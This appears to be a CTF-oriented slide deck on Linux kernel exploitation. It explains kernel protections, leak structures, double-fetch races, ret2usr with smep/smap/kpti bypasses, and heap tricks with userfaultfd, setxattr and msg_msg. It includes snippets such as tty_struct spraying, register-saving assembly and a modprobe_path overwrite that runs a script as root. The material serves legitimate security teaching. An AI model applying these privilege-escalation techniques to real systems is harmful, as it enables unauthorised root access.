Kernel Exploitation

Kernel Exploitation yuawn yuawn _yuawn

About • yuawn • Current Leader of Balsn / DoubleSigma
• NTU nslab

Outline
• Linux kernel concepts & debugging
• Kernel protections
  • smep, smap, kaslr, kpti
• Leaks & useful structures
  • tty_struct, shm_file_data, msg_msg ...
• Common kernel vulnerabilities
  • double fetch
  • race condition
• Exploitation & tricks
  • ret2usr - bypassing smep, smap, kpti
  • signal handler
  • modprobe_path
  • userfaultfd, setxattr, msgsnd & msgrcv, ...

Lab - kernel exploits demo • https://github.com/yuawn/kernel-exploitation • kernel module
• exploits

Linux Kernel

Kernel
• Software
• Implements syscalls
• Communicates with hardware
• Intel CPU ring model: ring 0, ring 1, ring 2, ring 3
  • ring 0: kernel space
  • ring 3: user space
(Diagram: Applications, OS, kernel, hardware: CPU, Memory, Disk, Devices)

Kernel - LKM
• Loadable kernel module
• Programs running in kernel space
  • drivers
  • kernel extensions
(Diagram: Applications, OS, kernel with a kernel module, hardware: CPU, Memory, Disk, Devices)

Kernel - functions
• copy_from_user(void *to, const void __user *from, unsigned long n)
• copy_to_user(void __user *to, const void *from, unsigned long n)
• printk()
• kmalloc()
• kfree()

Kernel Pwn
• kernel exploitation
• Privilege escalation
  • linux root account
  • user space to kernel space
  • ring 3 -> ring 0

Kernel Pwn
• Modified kernel
  • Mobile: Android, ARM TrustZone
  • IoT
• Kernel Module
• Original Linux Kernel
  • CVE
(Diagram: APPs and OS (kernel) next to Trusted APPs and Trusted OS, on top of the Hypervisor and ARM Trusted Firmware)

CTF kernel pwn

CTF Prepare - files
• bzImage - kernel
• initramfs.cpio.gz - file system
• run.sh - shell script for running qemu

CTF Prepare - running script
• run.sh
  • How to run with qemu
  • Check the kernel protections: smep, smap, kaslr

    #!/bin/bash
    qemu-system-x86_64 \
        -kernel ./bzImage \
        -initrd ./initramfs.cpio.gz \
        -nographic \
        -monitor none \
        -cpu qemu64,+smep,+smap \
        -append "console=ttyS0 kaslr panic=1" \
        -no-reboot \
        -m 256M

• https://github.com/torvalds/linux/blob/master/Documentation/admin-guide/kernel-parameters.txt

CTF Prepare - kernel
• bzImage
  • https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux
  • $ ./extract-vmlinux.sh bzImage > vmlinux
  • vmlinux: ELF 64-bit LSB executable, x86-64
• static analysis
• Find kernel ROP gadgets:
  • $ ropper --nocolor --file ./vmlinux > rop

CTF Prepare - file system
• initramfs.cpio.gz
  • $ gunzip initramfs.cpio.gz && cpio -idv < initramfs.cpio
• Extracted file system
  • /challenge.ko - kernel module
  • /init
  • /flag
    • -r-------- 1 root 0 /flag

CTF Prepare - init file
• /init
  • Check how the challenge environment is initialized
  • insmod challenge.ko
  • echo 1 > /proc/sys/kernel/kptr_restrict
    • 0 -> no restrictions
    • 1 -> the user needs the CAP_SYSLOG capability (root)
    • 2 -> %pK is always printed as 0, regardless of privileges
  • echo 1 > /proc/sys/kernel/dmesg_restrict
    • 0 -> no restrictions
    • 1 -> the user needs the CAP_SYSLOG capability (root)

CTF Prepare - .ko
• /challenge.ko
  • The main challenge binary
  • Usually implemented as a miscdevice or driver; after open(), user space talks to the kernel module through ioctl or other file operations.
    • /dev/challenge
    • /proc/challenge

CTF Prepare - exploit
• Write the exploit in C (or another language) and compile it into an exploit binary
• Upload it into the qemu VM on the remote server
  • printf "" >> exp
  • echo "" | base64 -d >> exp
• $ musl-gcc -static exp.c -o exp
  • A lightweight libc: shrinks the exploit binary and cuts upload time
  • $ sudo apt install musl-tools
• Run the exploit from the shell

Kernel Debug

Debug
• $ dmesg
  • printk()
• $ cat /proc/kallsyms
  • function symbol
  • find kernel base:
    • $ cat /proc/kallsyms | grep _text | head -n 1
• $ cat /proc/modules
  • find kernel module base:
    • $ cat /proc/modules | grep <module name>
• $ cat /proc/slabinfo
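The kernel-base lookup can also be done from inside the exploit binary. The following is a minimal sketch, assuming /proc/kallsyms is readable and its addresses are not zeroed by kptr_restrict; the helper names kallsyms_match and kallsyms_lookup are made up for illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Parse one /proc/kallsyms line ("<hex addr> <type> <name> [module]").
 * Returns 1 and fills *addr when the symbol name equals `want`, else 0. */
int kallsyms_match(const char *line, const char *want, unsigned long long *addr)
{
    unsigned long long a;
    char type;
    char name[256];

    assert(line && want && addr);
    if (sscanf(line, "%llx %c %255s", &a, &type, name) != 3)
        return 0;
    if (strcmp(name, want) != 0)
        return 0;
    *addr = a;
    return 1;
}

/* Scan a kallsyms-style file for `want`.
 * Returns 0 if the file cannot be opened or the symbol is missing;
 * a hidden (zeroed) address also comes back as 0. */
unsigned long long kallsyms_lookup(const char *path, const char *want)
{
    char line[512];
    unsigned long long addr = 0;
    FILE *f = fopen(path, "r");

    if (!f)
        return 0;
    while (fgets(line, sizeof(line), f)) {
        if (kallsyms_match(line, want, &addr))
            break;
    }
    fclose(f);
    return addr;
}
```

Calling kallsyms_lookup("/proc/kallsyms", "_text") mirrors the grep shown on the slide. As an unprivileged user with kptr_restrict set, expect 0 rather than a real address.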

Debug
• Edit the init file to get a root shell, which makes debugging easier
  • setsid cttyhack setuidgid 1000 sh (before)
  • setsid cttyhack setuidgid 0 sh (after: uid 0)
• Repack the file system for qemu:
  • $ find . -print0 | cpio --null -ov --format=newc > rootfs.cpio 2>/dev/null

Debug
• run.sh: qemu-system-x86_64
  • -s opens a gdb debug port on the default port 1234
  • -S stops the CPU at startup, before execution begins
  • -append "nokaslr" turns off kaslr
• Attach with gdb
  • target remote localhost:1234
  • add-symbol-file challenge.ko baseaddr
  • add-symbol-file vmlinux baseaddr

Kernel Protection

kernel protections • smep • smap • kaslr - kernel
ASLR • kpti

smep
• Supervisor Mode Execution Protection
• In ring 0 (kernel mode), the CPU cannot execute code located in user space
• Controlled by a bit in the cr4 register (bit 20)

smap
• Supervisor Mode Access Protection
• Similar to smep: in ring 0 (kernel mode), the CPU cannot access user-space memory
• Controlled by a bit in the cr4 register (bit 21)

kpti
• kernel page-table isolation
• cr3 register
  • page-table entry
• Effect similar to smep + smap
• Meltdown, Spectre
• $ dmesg | grep "Kernel/User page tables isolation: enabled"

Information leak in kernel

Leak
• CVE
  • 1 day
  • 0 day
• Vulnerable implementation in kernel module
  • Same concepts as in ordinary user-space exploitation
  • uninitialized memory
  • oob or arbitrary read/write
  • race condition
  • ...

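Leak
• If a module has a bug such as uncleared or uninitialized memory, copy_to_user() can write leftover addresses back to user space, leaking the residual contents.
• If the kernel heap memory a module requests is not cleared or initialized, the exploit binary in user space should first perform operations that make the kernel allocate heap memory, so that kernel text, kernel stack, and kernel heap addresses are left behind on the heap and the chunk the kernel module later receives contains them.
• The idea resembles user-space heap exploitation: free a chunk into the unsorted bin so that a libc address appears on the heap.
• The goal is to find handy kernel structures to allocate that serve this purpose.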

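useful structure for leak
• Allocation and freeing are easy to control from user space
• A suitable size, so the same chunk is likely to be handed out again later
  • heap spray
  • depending on the case, whether the kmalloc() size can be controlled
• The structure is full of pointers
  • kernel text, heap, stack
  • vtable: function pointers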

useful structure for leak
• tty_struct (0x2e0, 0x2c0): base, heap
• shm_file_data (0x20): base, heap
• seq_operations (0x20): base
• msg_msg (0x30 ~ 0x1000): heap
• subprocess_info (0x60): base, heap
• ...
• Any other structure you find usable
• Structure sizes change between kernel versions
• https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628

tty_struct
• Leak: base, heap
• Size: 0x2c0
  • A rarely used size, so it is easy to get the same chunk back
• int pfd = open("/dev/ptmx", O_RDWR|O_NOCTTY);
  • Easy to trigger from user land
• tty_operations
  • Works like a vtable: it stores function pointers for tty operations such as open, write, close, ioctl ...
  • With a primitive such as UAF, overwrite the struct tty_operations pointer so that it points to a controlled region; for example, with a modified write operation pointer, calling write(pfd, ,) on the tty gives control of the kernel rip

    struct tty_struct {
        int magic;
        struct kref kref;
        struct device *dev;
        struct tty_driver *driver;
        const struct tty_operations *ops;
        int index;
        /* Protects ldisc changes: Lock tty not pty */
        struct ld_semaphore ldisc_sem;
        struct tty_ldisc *ldisc;
        ...

tty_operations
• include/linux/tty_driver.h

    struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        int (*write_room)(struct tty_struct *tty);
        int (*chars_in_buffer)(struct tty_struct *tty);
        int (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ....

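• heap spray tty_struct

    int pfd[0x100];

    /* Each open() of /dev/ptmx allocates a tty_struct. */
    for (int i = 0; i < 0x100; ++i)
        pfd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);

    /* Closing the descriptors releases the tty_structs again. */
    for (int i = 0; i < 0x100; ++i)
        close(pfd[i]);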

Kernel Common Vulnerability

double fetch
• A race condition between kernel space and user space
• The kernel reads the same user-space data twice, which opens a window for a race condition

double fetch (diagram: a user-space program and a kernel module in kernel space)
• The program issues a syscall/ioctl; user memory at 0x401000 holds 0x30
• 1st fetch (check): copy_from_user() reads 0x30; the check 0x30 < 0x100 is True
• If nothing changes, the 2nd fetch (use) reads 0x30 again with copy_from_user()
• Attack: between the two fetches, the program modifies the user data so that 0x401000 holds 0x1000
• 2nd fetch (use): copy_from_user() reads 0x1000; 0x1000 < 0x100 is False, but the check has already passed
• Pwned ☠

double fetch
• The right way
  • A single copy_from_user()
  • Copy the data into the kernel first, then do all further work on that copy
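The difference between the vulnerable and the fixed pattern can be simulated in plain user-space C. This is only a sketch: the struct request, the race_hook callback (standing in for a racing user thread) and the 0x100 limit are assumptions for illustration, and ordinary memory reads stand in for copy_from_user().

```c
#include <assert.h>
#include <stddef.h>

#define MAX_LEN 0x100

/* Stand-in for a request living in user memory. */
struct request {
    size_t len;
};

/* Hook standing in for a racing user thread that runs between kernel reads. */
typedef void (*race_hook)(volatile struct request *req);

/* Vulnerable pattern: the length is fetched once for the check
 * and a second time for the use. */
size_t handle_double_fetch(volatile struct request *user_req, race_hook race)
{
    if (user_req->len >= MAX_LEN)   /* 1st fetch (check) */
        return 0;
    if (race)
        race(user_req);             /* user data changes here */
    return user_req->len;           /* 2nd fetch (use): may exceed MAX_LEN */
}

/* Fixed pattern: fetch once into a local copy, then check and use the copy. */
size_t handle_single_fetch(volatile struct request *user_req, race_hook race)
{
    struct request local;

    local.len = user_req->len;      /* single fetch, like one copy_from_user() */
    if (local.len >= MAX_LEN)
        return 0;
    if (race)
        race(user_req);             /* too late: the copy is already taken */
    return local.len;
}

/* Example racing write: change the length from 0x30 to 0x1000, as in the slides. */
void grow_to_0x1000(volatile struct request *req)
{
    req->len = 0x1000;
}
```

With a request whose len starts at 0x30, handle_double_fetch() ends up using 0x1000 even though the check passed, while handle_single_fetch() keeps using the checked value.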

Kernel Exploitation

ret2user

ret2user
• User mode cannot access kernel space, but kernel mode can access user space
• While executing in kernel mode, return to user-space code and run it with ring 0 privileges
• control kernel rip
• Status switch
  • user space to kernel space
  • kernel space to user space
  • arch/x86/entry/entry_64.S

ret2user
• Status switch
  • kernel space to user space
    • Restore the GS value with the swapgs instruction
    • iret instruction
      • iretq
    • The register values are stored on the stack
(Diagram: the kernel rsp points to "swapgs ; ret", then "iretq", followed by user space rip, user cs, user rflags, user sp, user ss)
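The stack layout for the return to user space can be sketched as a small helper that appends the words to a ROP chain. The struct user_state and the function name are hypothetical, and both gadget addresses are placeholders the exploit would have to locate in vmlinux.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Saved user-mode context, captured before entering the kernel. */
struct user_state {
    uint64_t rip;      /* user-space address to resume at */
    uint64_t cs;
    uint64_t rflags;
    uint64_t sp;
    uint64_t ss;
};

/* Append "swapgs; ret", "iretq" and the five-word iretq frame to a chain.
 * swapgs_ret and iretq are placeholder gadget addresses.
 * Returns the new number of used slots. */
size_t append_return_to_user(uint64_t *chain, size_t n,
                             uint64_t swapgs_ret, uint64_t iretq,
                             const struct user_state *st)
{
    assert(chain && st);
    chain[n++] = swapgs_ret;   /* restore the user GS base */
    chain[n++] = iretq;        /* pops the five values below */
    chain[n++] = st->rip;
    chain[n++] = st->cs;
    chain[n++] = st->rflags;
    chain[n++] = st->sp;
    chain[n++] = st->ss;
    return n;
}
```

iretq pops rip, cs, rflags, rsp and ss in that order, so the saved user values must follow the iretq gadget in exactly this sequence.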

ret2user
• Status switch
  • kernel space to user space
    • Save status

    size_t user_cs, user_ss, user_rflags, user_sp;

    /* Intel-syntax inline assembly: build with gcc -masm=intel */
    void save_status()
    {
        __asm__("mov user_cs, cs;"
                "mov user_ss, ss;"
                "mov user_sp, rsp;"
                "pushf;"
                "pop user_rflags;"
                );
        puts("[*]status has been saved.");
    }

ret2user • Constraints • smep • smap • kpti

Bypass smep
• ROP
  • The same idea as bypassing NX
  • Pivot the kernel stack pointer (rsp) to user space and ROP there
  • ROP directly inside the kernel

Bypass smap
• ROP on user-space memory is dead
• Disallows explicit supervisor-mode data accesses to user-mode pages
• How do copy_from_user() and copy_to_user() work?

Bypass smap
• arch/x86/lib/copy_user_64.S
• instruction
  • stac - allow
  • clac - disallow

    SYM_FUNC_START(copy_user_generic_unrolled)
        ASM_STAC
        cmpl $8,%edx
        jb 20f      /* less then 8 bytes, go to byte copy loop */
        ALIGN_DESTINATION
        movl %edx,%ecx
        andl $63,%edx
        shrl $6,%ecx
        jz .L_copy_short_string
        ...
        movl %edx,%ecx
    21: movb (%rsi),%al
    22: movb %al,(%rdi)
        incq %rsi
        incq %rdi
        decl %ecx
        jnz 21b
    23: xor %eax,%eax
        ASM_CLAC
        ret

Bypass smap • instruction • stac - allow • clac
- disallow • Only allowed in kernel mode, they fault in user-space.

Bypass smap
• Overwrite the cr4 register
  • First do some work in the kernel (ROP, ...) to overwrite the cr4 register -> 0x6f0
  • With smep and smap turned off, return to user space to execute code or ROP there
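Why 0x6f0 disables both protections can be checked with a little bit arithmetic. The sketch below assumes the x86 layout in which SMEP is bit 20 and SMAP is bit 21 of cr4; the macro and function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)   /* Supervisor Mode Execution Protection */
#define CR4_SMAP (1ULL << 21)   /* Supervisor Mode Access Protection */

/* Report whether a given cr4 value has each protection switched on. */
int cr4_smep_enabled(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
int cr4_smap_enabled(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }

/* Value to load into cr4 to clear both bits while keeping the others. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

For example, a cr4 value of 0x3006f0 has both bits set, and clearing them yields the 0x6f0 used on the slide.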

ret2user
• Constraints
  • bypass smep
    • Pivot the kernel stack pointer (rsp) to user space and ROP there
    • ROP directly inside the kernel
  • bypass smap
    • First do some work in the kernel (ROP, ...) to overwrite the cr4 register -> 0x6f0
    • With smep and smap turned off, return to user space to execute code or ROP there
  • kpti
    • fix the cr3 register - page table
    • swapgs_restore_regs_and_return_to_usermode()

privilege escalation
• ROP
  • commit_creds(prepare_kernel_cred(0))
• ret2user -> system("/bin/sh")
  • spawn a root shell!
• ROOT ☠
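As a ROP chain, commit_creds(prepare_kernel_cred(0)) might be laid out as follows. This is a sketch under assumptions: every address in struct kernel_gadgets is a placeholder to be resolved from the kernel base and vmlinux, and the "mov rdi, rax; ret" gadget is hypothetical (real kernels often only offer a messier equivalent).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Addresses the exploit must resolve itself; all fields are placeholders. */
struct kernel_gadgets {
    uint64_t pop_rdi_ret;          /* "pop rdi; ret" */
    uint64_t mov_rdi_rax_ret;      /* hypothetical "mov rdi, rax; ret" */
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
};

/* Write the ROP words for commit_creds(prepare_kernel_cred(0)).
 * Returns the number of slots used. */
size_t build_cred_chain(uint64_t *chain, const struct kernel_gadgets *g)
{
    size_t n = 0;

    assert(chain && g);
    chain[n++] = g->pop_rdi_ret;
    chain[n++] = 0;                        /* rdi = 0 */
    chain[n++] = g->prepare_kernel_cred;   /* rax = new credentials */
    chain[n++] = g->mov_rdi_rax_ret;       /* rdi = rax */
    chain[n++] = g->commit_creds;          /* apply them to the current task */
    return n;
}
```

After these five words the chain still has to return to user space, where the exploit calls system("/bin/sh") to get the root shell.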

Kernel Exploitation - Universal Solutions

modprobe_path

modprobe_path
• kernel global variable
• default path: /sbin/modprobe
• $ cat /proc/sys/kernel/modprobe
• When a file with an executable format the kernel does not recognize is executed, the kernel runs the file named by this path with root privileges.

modprobe_path
• sys_execve
  • do_execve()
  • do_execveat_common()
  • bprm_execve()
  • exec_binprm()
  • search_binary_handler()
  • request_module()
  • call_modprobe()
  • call_usermodehelper_exec()

    static int search_binary_handler(struct linux_binprm *bprm)
    {
        ...
        if (need_retry) {
            if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
                printable(bprm->buf[2]) && printable(bprm->buf[3]))
                return retval;
            if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
                return retval;
            need_retry = false;
            goto retry;
        }
        ...

modprobe_path
• exploitation
  • Overwrite modprobe_path with the path of your own shell script, /tmp/x
    • $ echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x
    • $ chmod +x /tmp/x
  • Execute a file with a broken executable format
    • $ echo -ne '\xff\xff\xff\xff' > /tmp/fake
    • $ chmod +x /tmp/fake && /tmp/fake
  • The kernel executes /tmp/x with root privileges
  • cat /flag
• ROOT ☠

modprobe_path
• android root
  • http://powerofcommunity.net/poc2016/x82.pdf
• poweroff_cmd

setxattr & userfaultfd

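userfaultfd
• syscall - 323
• Registers a userfault memory region and lets you implement the page fault handler yourself
  • You control how page faults are handled
• When the kernel performs copy_from_user() or copy_to_user(), accessing the user memory triggers a page fault, which your page fault handler can then handle as it chooses.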

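userfaultfd
• What it offers for exploitation
  • race condition friendly
  • For example, sleeping inside the page fault handler stalls the execution flow in the kernel
  • Other operations can run before the fault is resolved, so the order of execution is under control
  • The scenario that triggers the race condition then happens reliably, with no need to win the race by chance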
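The registration and handler flow might look like the sketch below, which intercepts a single fault on one page and resolves it with UFFDIO_COPY. The names uffd_ctx, fault_handler and uffd_demo are made up; the sketch also assumes the process is allowed to use userfaultfd (many systems restrict it for unprivileged users) and returns 0 when it is not.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

struct uffd_ctx {
    int fd;        /* userfaultfd descriptor */
    void *src;     /* prepared page used to resolve the fault */
    size_t page;   /* page size */
};

/* Handler thread: waits for one page fault, then resolves it. */
static void *fault_handler(void *arg)
{
    struct uffd_ctx *ctx = arg;
    struct pollfd pfd = { .fd = ctx->fd, .events = POLLIN };
    struct uffd_msg msg;

    if (poll(&pfd, 1, -1) <= 0)
        return NULL;
    if (read(ctx->fd, &msg, sizeof(msg)) != (ssize_t)sizeof(msg))
        return NULL;
    if (msg.event != UFFD_EVENT_PAGEFAULT)
        return NULL;

    /* The faulting thread is stalled at this point; an exploit would sleep
     * or run its other operations here before resolving the fault. */
    struct uffdio_copy copy = {
        .dst = msg.arg.pagefault.address & ~((unsigned long long)ctx->page - 1),
        .src = (unsigned long)ctx->src,
        .len = ctx->page,
        .mode = 0,
    };
    ioctl(ctx->fd, UFFDIO_COPY, &copy);
    return NULL;
}

/* Returns 1 if a fault was intercepted and filled, 0 if userfaultfd is not
 * usable in this environment, -1 if the page held unexpected data. */
int uffd_demo(void)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    int fd = (int)syscall(SYS_userfaultfd, O_CLOEXEC);
    if (fd < 0)
        return 0;

    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    char *region = mmap(NULL, page, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *src = mmap(NULL, page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (ioctl(fd, UFFDIO_API, &api) < 0 ||
        region == MAP_FAILED || src == MAP_FAILED) {
        close(fd);
        return 0;
    }
    memset(src, 'A', page);

    /* Ask for notifications when a missing page in `region` is touched. */
    struct uffdio_register reg = {
        .range = { .start = (unsigned long)region, .len = page },
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };
    struct uffd_ctx ctx = { .fd = fd, .src = src, .page = page };
    pthread_t th;
    if (ioctl(fd, UFFDIO_REGISTER, &reg) < 0 ||
        pthread_create(&th, NULL, fault_handler, &ctx) != 0) {
        close(fd);
        return 0;
    }

    /* The first touch faults and blocks until the handler's UFFDIO_COPY. */
    char first = *(volatile char *)region;
    pthread_join(th, NULL);
    close(fd);
    return first == 'A' ? 1 : -1;
}
```

In an exploit the faulting access would come from the kernel (inside copy_from_user() or copy_to_user()) rather than from the process itself, but the handler side stays the same.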

setxattr

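setxattr
• syscall - 188
• From user space, setxattr can be used directly to make kvmalloc() allocate a size in the range 1 ~ 65536 (0x10000) and copy user-land data into the allocation.
• setxattr + userfaultfd combo
  • Often chained with userfaultfd to stall the copy_from_user() in the middle; because you decide when the page fault is resolved and setxattr continues, you indirectly control when kfree() happens, which is handy for building a UAF.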

setxattr
• linux-5.9.12/fs/xattr.c#510

    static long
    setxattr(struct dentry *d, const char __user *name,
             const void __user *value, size_t size, int flags)
    {
        int error;
        void *kvalue = NULL;
        char kname[XATTR_NAME_MAX + 1];

        if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
            return -EINVAL;

        error = strncpy_from_user(kname, name, sizeof(kname));
        if (error == 0 || error == sizeof(kname))
            error = -ERANGE;
        if (error < 0)
            return error;

        if (size) {
            if (size > XATTR_SIZE_MAX)
                return -E2BIG;
            kvalue = kvmalloc(size, GFP_KERNEL);
            if (!kvalue)
                return -ENOMEM;
            if (copy_from_user(kvalue, value, size)) {
                error = -EFAULT;
                goto out;
            }
            if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
                (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
                posix_acl_fix_xattr_from_user(kvalue, size);
            else if (strcmp(kname, XATTR_NAME_CAPS) == 0) {
                error = cap_convert_nscap(d, &kvalue, size);
                if (error < 0)
                    goto out;
                size = error;
            }
        }

        error = vfs_setxattr(d, kname, kvalue, size, flags);
    out:
        kvfree(kvalue);
        return error;
    }

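setxattr + userfaultfd
• Use userfaultfd to stall the copy_from_user() inside setxattr, so the chunk is not kfree()'d right away
• When the chunk needs to be kfree()'d, the self-implemented userfaultfd page fault handler copies in a prepared mmap'ed page to resolve the page fault, and setxattr then runs on to the kfree()
• This removes the drawback that setxattr gives arbitrary control over the timing, size, and content of kmalloc() but no control over the timing of kfree().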

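setxattr + userfaultfd
• Once chained, directly from user land you can:
  • Call kmalloc() at any time
  • Use a size range that covers the vast majority of needs: 1 ~ 65536 (0x10000)
  • Fully control the chunk contents from user land
  • With userfaultfd, choose when kfree() happens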

setxattr + userfaultfd
• SECCON 2020 - Kstack
  • https://github.com/BrieflyX/ctf-pwns/tree/master/kernel/kstack

msg_msg • msgget() • msgsnd() • msgrcv() • https://duasynt.com/blog/linux-kernel-heap-spray

msg_msg
• int qid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)
• msgsnd(qid, &msgbuf, real_size - 0x30, 0)
  • kmalloc(size+0x30)
  • Copies the msgbuf contents to chunk + 0x30; the first 0x30 bytes are the header
• msgrcv(qid, &msgbuf, real_size - 0x30, 1, 0)
  • kfree
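The msgsnd()/msgrcv() pair can be wrapped into two small helpers. This is a sketch that takes the 0x30-byte header size from the slide as given; the names msg_alloc, msg_free and struct spray_msg are made up, and message type 1 is an arbitrary choice.

```c
#include <assert.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define MSG_HDR 0x30     /* msg_msg header size, per the slide */
#define MSG_MAX 0x1000   /* largest chunk size handled here */

struct spray_msg {
    long mtype;
    char mtext[MSG_MAX - MSG_HDR];
};

/* Queue one message so the kernel allocates a chunk of `chunk_size` bytes
 * whose body is filled with `fill`. Returns 0 on success, -1 on error. */
int msg_alloc(int qid, size_t chunk_size, char fill)
{
    struct spray_msg m;

    if (chunk_size <= MSG_HDR || chunk_size > MSG_MAX)
        return -1;
    m.mtype = 1;
    memset(m.mtext, fill, sizeof(m.mtext));
    return msgsnd(qid, &m, chunk_size - MSG_HDR, IPC_NOWAIT);
}

/* Receive the message again, which frees the chunk. Copies the body to
 * `out` if it is non-NULL. Returns the body length or -1 on error. */
ssize_t msg_free(int qid, size_t chunk_size, char *out)
{
    struct spray_msg m;

    if (chunk_size <= MSG_HDR || chunk_size > MSG_MAX)
        return -1;
    ssize_t n = msgrcv(qid, &m, chunk_size - MSG_HDR, 1, IPC_NOWAIT);
    if (n > 0 && out)
        memcpy(out, m.mtext, (size_t)n);
    return n;
}
```

With a queue from msgget(IPC_PRIVATE, 0644 | IPC_CREAT), msg_alloc(qid, 0x100, 'B') requests a 0x100-byte chunk and msg_free(qid, 0x100, buf) releases it at a moment of the exploit's choosing.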

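msg_msg
• Pros
  • Easy to control kmalloc() and kfree() from user land
  • The code is easy to write
  • The kfree() timing is easier to control than with setxattr + userfaultfd: just call msgrcv()
• Cons
  • The first 0x30 bytes of the kmalloc'ed chunk are hard to control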

Thanks! yuawn _yuawn
